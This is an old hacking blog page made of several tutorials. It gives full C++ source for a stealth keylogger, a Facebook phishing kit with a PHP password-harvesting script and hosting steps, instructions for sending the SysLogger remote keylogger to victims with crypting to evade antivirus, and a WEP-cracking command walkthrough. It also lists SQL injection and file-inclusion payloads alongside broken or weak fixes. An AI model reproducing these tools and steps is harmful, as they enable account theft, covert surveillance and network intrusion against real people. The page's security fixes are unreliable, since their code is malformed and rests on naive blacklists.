Saturday 4 January 2014

Create Keylogger in C++

coding-wallpaper-binary

Hey guys! What’s up ?

Well, it’s been quite a long time since I posted. There were some web hosting issues at first and then my exams so I didn’t really get time to make a post or write some tutorials etc. Now that I have got a bit time, I thought to share some stuff with you. So I remember the days when I used to make keyloggers in programming languages. It was fun. Those keyloggers would be very easy . Nowadays, you can can also make keylogger for your personal use and to record the keystrokes of your own computer.

Well, that’s a pretty basic tutorial. It just involves a bit of coding in C++.

First, you need to download the DEVC++ from here http://www.bloodshed.net/.

It’s the software that are you going to use for C++ programming.

Okay, so once you download DEVC++ , install it and the run the Dev Compiler. If you have got some knowledge of Visual Basic then it would be better, you can modify the code then.

 

#include <iostream>

using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,”LOG.txt”);
}
}
system (“PAUSE”);
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, “a+”);
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, “%s”, “[BACKSPACE]“);
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, “%s”, “\n”);
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, “%s”, ” “);
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, “%s”, “[TAB]“);
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, “%s”, “[SHIFT]“);
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, “%s”, “[CONTROL]“);
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, “%s”, “[ESCAPE]“);
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, “%s”, “[END]“);
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, “%s”, “[HOME]“);
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, “%s”, “[LEFT]“);
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, “%s”, “[UP]“);
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, “%s”, “[RIGHT]“);
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, “%s”, “[DOWN]“);
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, “%s”, “.”);
else
fprintf(OUTPUT_FILE, “%s”, &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA(“ConsoleWindowClass”, NULL);
ShowWindow(Stealth,0);
}

Copy this above  Junk of code and paste it int the dev compiler. After that, press F5 to compile code.

Then execute the program by selecting execute.  (Ctrl + F10 )
Now your keylogger will run on your computer and the keystrokes would be stored in logs.txt file.

You can then view the logs anytime by opening that logs text file.


Posted by at 1 comment:

Change Facebook theme on Mozilla Firefox

Hey,are you bored of seeing your Facebook default’s theme everyday? And wish you could change it?
So,here is a simple trick which will allow you to change your Facebook theme.It’s really easy.I have changed mine too using  this trick.

Okay,so lets get started…

How to change Facebook default theme in Mozilla Firefox :

    • First of all make sure you have Mozilla Firefox installed in your computer.If not,so download it

Download Mozilla Firefox!

  • Open Mozilla Firefox and go here
  • Then click on Add to Firefox so that this add on installs in your browser.
  • Once the add-on is installed, go to this link
  • Here you will see tons of Facebook themes.Click the one of your choice and install it.

You have  now successfully changed your current/default Facebook theme!
For any confusions or problems,just comment down below,I will solve your problem.

Bye and have a good day.

Peace!

Posted by at No comments:

How to hack facebook gmail yahoo instagram pinternet idxx by Phishing in 2 easy


So lets get started..:)

What is Phishing?

Phishing is a technique used by hackers in which they make a fake login page and then they grab the serious information from their victims :D

It’s a very easy way to hack  facebook,yahoo,hotmail,gmail,aol etc accounts and it works very well !
All you need to do is to make a phishing page of the login pages of  facebook/gmail etc (which you want to hack) and then tell your victim to login there and once he/she does,you get his/her id  (whoaa!).. :D

Example fb 

How to hack a facebook account using phishing?

For hacking facebook with phishing,you need to do two things.

  1. Creating a Facebook Phishing Page i.e a clone of facebook login page.
  2. Uploading  the phishing page to a free webhost.

How to make a Facebook Phishing page?

For making a facebook phishing page follow the steps below :

  • Go to www.facebook.com/login ,wait until the page loads properly and then copy the page source (for copying the page source, right click anywhere on the page,click on view page source and copy the whole piece of code)
  • Once you copy the page source so paste it in a notepad file.
  • Next search for  action=”/login.php?login_attempt=1″ in that notepad file and change it with action =“pass.php”.
  • Then save that notepad file as an html file i.e index.html
  • Now open a new notepad file,copy the below code and save the file as pass.php

<?php

header (‘Location: https://www.facebook.com’);
$handle = fopen(“passwords.html”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

How to Upload Phishing Page to a  Webhost ?

Now,you have to upload your phishing page along with that pass.php file  to a webhost.For this search google for free webhosts and you will find many.

But the one I recon is 000webhost.com  .

  • So go to 000webhost.com , click on sign up and register an account there. During registeration,select the option “Use a free subdomain” and pick up a free subdomain.
  • After registering,you will recieve a message from 000webhost to your email in which there will be your login,ftp account information etc.
  • Next login using that account, click on File Manager,go to public_html directory and upload those two files i.e index.html and pass.php

 

Now all you have to do is to give the link of your free subdomain (which you selected during registration) to your victim and tell him/her to login there.

Once he/she does you will get his/her password in a passwords.html file.For viewing the passwords,you will have to go to :
www.yoursite.com/passwords.html  (Change yoursite.com with that free subdomain )

That’s it, so simple and easy!

You can hack many facebook accounts using this phishing technique but I really don’t want that this should be used for illegal purposes.All that you are gonna do with it is at your own risk/choice and I won’t be responsible for any of your actions.

Posted by at 1 comment:

Hack Facebook account using syslogger keylogger


Hacking-via-keylogger

I’m here again with a new tutorial about how to hack a facebook account using a keylogger.It’s very simple and easy.All you need to do is to read the below tutorial carefully!..:)

Okay,so lets get started !

What’s a keylogger ?

Keylogger is a program which you will send to your victim and once he/she opens it.It will record all the keystrokes  (i.e what he/she types on keyboard) and then it will send those keystrokes to your email account.

How to send keylogger to your Victim?

For this,first you need to download a keylogger software which has the feature of remote installation.There are many keyloggers available on internet (you can google them) but the one I recommend is SysLogger.

It’s an epic keylogger.It has many features like stealing saved passwords,deleting the victim’s cookies,disabling task manager etc.. And the best thing about it is that it’s totally free! :D
It is created by a coder of HF (HackForums).

  • So download syslogger  keylogger from here.
  • When you download it,you will get a rar file.Extract its contents.
  • Next,open Syslogger Builder.exe and do all the settings like this :

How-to-use-syslogger

  • Then click on “Build Server” and it will ask  you that where you want to save your server and which name do you want to give it.
  • So give it any name and save it.Now you will get your server file.This is the file that you will send to your victim.

That’s it!

Next,send this file to your friend or anyone you want to hack  via skype or something and once he/she opens it,you will start receiving his/her keylogs to your gmail account (that account which’s email and pass you entered while building your server)  :D.

You can also use a crypter to crypt your keylogger and bypass antivirus detections.
Update : I’m offering a crypting service now. The crypt will be totally FUD. You can check theServices Page for it .

The logic behind using a keylogger is that during this your victim might login to his/her  facebook account and when he/she does so that keystrokes will be also recorded and will be sent to your gmail account and once they are sent so you know what happens xD !

You can use your evil mind then :)

Okay so that was about the use of keyloggers etc i.e. how do they work and how to hack a Facebook account via keylogger.

You can also hack gmail,yahoo,aol etc and much more accounts like this :D

Anyway,bye and take care !

P.S I don’t want that this tutorial should be used for illegal purposes and I will not be responsible for the actions you take after reading this tutorial.

Posted by at No comments:

Wednesday 1 January 2014

RUN Commands


-----------------------------------------------------------
START >> RUN
Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control.exe admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
Date and Time Properties
timedate.cpl
DDE Shares
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (if installed)
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control.exe desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab Preselected)
control.exe color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control.exe folders
Fonts
control.exe fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
Java Control Panel (if installed)
jpicpl32.cpl
Java Control Panel (if installed)
javaws
Keyboard Properties
control.exe keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Microsoft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control.exe mouse
Mouse Properties
main.cpl
Network Connections
control.exe netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Nview Desktop Manager (if installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (if installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control.exe printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy
rsop.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control.exe schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility
sfc
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad
write
Try them out..
Posted by at No comments:

Window Hacking

window hack

>>Open COMMAND PROMPT while Locked by User.
  >open notepad
>type www.command.com
> then save as cmd.bat at desktop
>then enter now its open.....enjoy

>>If your computer is slow?
then clean up the ram..
 >Open notepad
>type FREEMEM=SPACE(64000000)
>Save it as ram.vbs
now run the script.
Check out !!


>>CracK BIOS Password
 >Open the CPU
>Observe the Motherbord
>Remove the Silver Battery(3v)
>Wait 2 minutes and place the Battery
>>Restoring a Lost Desktop-
>Start
>Run
Type a period " . "
Then press Enter


>>If ur PC is hanged then do this. Press shift+ctrl+esc or ctrl+alt+del
n den click on 'END TASK'
ur PC is runing now

>>create folder without name
 >select any folder
>rename it
>press alt & type 0160 or 255
>enter

>>Amazing trick for use Windows Backup Utility if installed
go to run
type ntbackup
ok
Now use backup

>>Increase the speed of your file sharing
 Simple Way to Share Multiple Folders :
Goto Run and Type SHRPUBW.EXE then press Enter
Select the folder you want to share and Set permissions,
your share folder is ready now..... 


>>Turning off the Help on Min, Max, Close Icons
 When the mouse goes over the minimize, maximize and close icons on the upper
right hand side of a window.

To disable that display:
1. Start Regedit
2. Go to HKEY_CURRENT_USER \ Control Panel \ Desktop
3. Create a String Value called MinMaxClose
4. Give it a value of 1
5. Reboot

>>FIX CORRUPTED FILE IN WINDOW XP 1.Load XP cd into cd drive

2. go to Run

3. type sfc/scannowok

4. Then copy its lost file frm cd.

  >>AUTO DELETE TEMPORARY FOLDER.!!
 what i prefer is %temp% " without quotes.. at Start -> Run.. this opens ur temp folder n den u cal erase it nearly
First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in
that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.


>>Locking Folders:
  • Consider you want to lock a folder named XXXX in your E:\, whose path is E:\XXXX.
  • Now open the Notepad and type the following
[code]ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code]
  • Where xxxx is your folder name. Save the text file as loc.bat in the same drive.
  • Open another new notepad text file and type the following
[code]ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx[/code]
  • Save the text file as key.bat in the same drive.
Steps to lock the folder:
  • To lock the xxxx folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
  • To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.
>>Locking Drives:
We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.
  • Start & Run and type Regedit to open Registry editor
  • Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
  • Create a new DWORD value NoViewOnDrive and set its value as
2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26
For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)
  • To lock more drives, calculate the value of each drive and then set sum of those numbers as value
  • To unlock your drive just delete the key from the registry.
>>To Remove Recyle Bin From Your Desktop
 Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.
>>Disable the Security Center warnings
 Follow the given steps to edit the computer registry for disable message:
First click on Start button then type Regedit in Run option.
Here locate the location to:
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
Here in right side panel, double click on Anti Virus Disable Notify and set its value 1.
Now close the registry editor and restart your computer after any changes to go into effect.

>>HIDE DRIVES
How to Hide the drives(c:,d:,e:,a:...etc)

To disable the display of local or networked drives when you click My Computer.
1.Go to start->run.Type regedit.Now go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 \Explorer

2.In the right pane create a new DWORD item and name it NoDrives(it is case sensitive).

3.Modify it's value and set it to 3FFFFFF (Hexadecimal) .

4.Restart the computer.

5.Now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created. Restart your computer. All the drives are back again.

>>Show your name in taskbar
 Trick to Show Your name after time in taskbar...
Try this trick to add up ur name in place of AM and PM beside time Its simple

Step-1:- Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...
Did It change? If not, follow step-2 below.

Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to change the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK
 Done
Posted by at No comments:

Wi-Fi Network Hacking




This tutorial will explain that how to crack wep key using Backtrack..!!

Step 1:-
First Download Backtrack  from the following link:
Step 2:-
Burn the iso image on CD and boot your laptop from CD drive
Step 3:-
Select the third boot option(VESA/KDE).
Step 4:-
Once in BT3, click the tiny black box in the lower left corner to load up a
 "Konsole" window.
Step 5:-
Type the following command
airmon-ng
Note down the interface name. In this example wifi0
Step 6:-
airmon-ng stop wifi0
Step 7:-
ifconfig wifi0 down
Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0
Step 9:-
airmon-ng start wifi0
Step 10:-
airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with STATION associated with it,
means you some one is accessing that network and our task will be little easier.
If not than don’t worry we will still crack it.
Step 11:-
airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
--bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole
Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful mesage then keep on trying until
you got success.
Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing or still 0
than it means no 1 is
accessing that network.But don’t worry you go an optional step,
Leave this console as it is and start new k
Step 14:-
aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success
got an optional step
konsole
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.
Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.
Hurray we got the key.

Done..!!
Posted by at No comments:

Website Security Tools

GoLismero is an Open Source security tools that can run their own security tests and manage a lot of well known security tools (OpenVas, Wfuzz, SQLMap, DNS recon, robot analyzer...) take their results. The framework also collects and unifies the results of well known tools: sqlmap, xsser, openvas, dnsrecon, theharvester.. Read more

WebScarab:It is a framework for analysing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab. 

Bricks: It's a web application security learning platform built on PHP and MySQL.
The project focuses on variations of commonly seen application security issues. Each 'Brick' has some sort of security issue which can be leveraged manually or using automated software tools. The mission is to 'Break the Bricks' and thus learn the various aspects of web application security. Bricks is a completely free and open source project brought to you by OWASP.
Download

Panoptic:
It is a tool that searches for commonly known files through LFI vulnerabilities. Local file inclusion is a vulnerability that allows the attacker to read files that are stored locally through the web application.This happens because the code of the application does not properly sanitize the include() function. To get started, you will need Python 2.6+. Panoptic display the found file paths and it can save the actual files as well.

Download

ModSecurity:
It is a web application firewall that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis.

Download
Posted by at No comments:

Website Security



How Can We Block Common Web Attacks And Protect Our Website..

A: SQL Injection
-->Types                   
  •  Login Form Bypassing
  •   UNION SQL Injection
           B: Cross Site Scripting
                             --> Cross Site Request Forgery
C: File Inclusion
          Types-> Remote File Inclusion and Remote Code Execution
   

On this post i am telling about five types of common web attacks, which are used in most types of defacements or dumps of databases.
The five exploits listed above are SQL injection, XSS, RCE, RFI, and LFI. Most of the time, we missed out some website code tags..
coz of this we get website attacks and allows the hacker for attack on vulnerable website.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

A: SQL Injection

--> LOGIN FORM BYPASSING

Here is an example of the vulnerable code that we can bypass very easily:

index.html file:
<form action="login.php" method="POST" />
<p>Password: <input type="text" name="pass" /><br />
<input type="submit" value="Authenticate" /></p>
</form>

login.php file:
<?php
// EXAMPLE CODE
$execute = "SELECT * from database WHERE password = '{$_POST['pass'])";
$result = mysql_query($execute);
?>

We can simply bypass this by using ' or '1=1', which will execute "password = ''or '1=1'';".

Alternatively, the user can also delete the database by executing "' drop table database; --".

PREVENTION:

Use mysql_real_escape_string in your php code.

Example:

<?php
$badword = "' OR 1 '";
$badword = mysql_real_escape_string($badword);
$message = "SELECT * from database WHERE password = "'$badword'";
echo "Blocked " . $message . ";
?>

--> UNION SQL Injection

UNION SQL injection is when the user uses the UNION command. The user checks for the vulnerability by
adding a tick to the end of a ".php?id=" file. If it comes back with a MySQL error, the site is most likely
vulnerable to UNION SQL injection. They proceed to use ORDER BY to find the columns, and at the end, they use
the UNION ALL SELECT command. An example is shown below.

http://www.site.com/website.php?id=1'

You have an error in your SQL syntax near '' at line 1 SELECT SUM(quantity)
as type FROM orders where (status='completed' OR status='confirmed' OR status='pending') AND user_id=1'

No error--> http://www.site.com/website.php?id=1 ORDER BY 1-- 

 Two columns, and it comes back with an error! This means that there is one column.
 http://www.site.com/website.php?id=1 ORDER BY 2--

Selects the all the columns and executes the version() command on the only column.
http://www.site.com/website.php?id=-1 UNION SELECT ALL version()--

SOLUTION:

Add something like below to prevent UNION SQL injection.

$evil = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";
$patch = eregi_replace($evil, "", $patch);

>-------------------------------------------------------<

B: Cross Site Scripting

Cross site scripting is a type of vulnerability used by hackers to inject code into vulnerable web pages.
If a site is vulnerable to cross site scripting, most likely users will try to inject the site with malicious javascript or try to
scam users by creating a form where users have to type their information in.
 Two types of XSS (cross site scripting) are persistent XSS and non-persistent XSS.

Example:
http://www.site.com/search.php?q=">

SOLUTION
(javascript) (Thank you, Microsoft!):

function RemoveBad(strTemp) {
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
    return strTemp;
}

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

C: File Inclusion

 Types: Remote File Inclusion/Local File Inclusion, and Remote Code Execution

Remote File Inclusion allows a hacker to include a remote file through a script (usually PHP). This code is mostly patched on websites, but some websites are still
vulnerable to the vulnerability. RFI usually leads to remote code execution or javascript execution.

Example of the vulnerable code:

<?php
include($_GET['page']);
?>

Exploiting it would be something like this:
http://www.site.com/page.php?page=../../../../../etc/passwd or
http://www.site.com/page.php?page=http://www.site.com/xyz.txt?

SOLUTION:

Validate the input.
$page = $_GET['page'];
$allowed = array('index.php', 'games.php' 'ip.php');
$iplogger = ('ip.php');
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die("IP logged.");
}

For remote code execution, the site would have to have a php executing command. You would patch this by about doing the same thing.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


 Note: Hope this post will helpful for your website to secure from these types of attacks..
Posted by at No comments:
Subscribe to: Posts (Atom)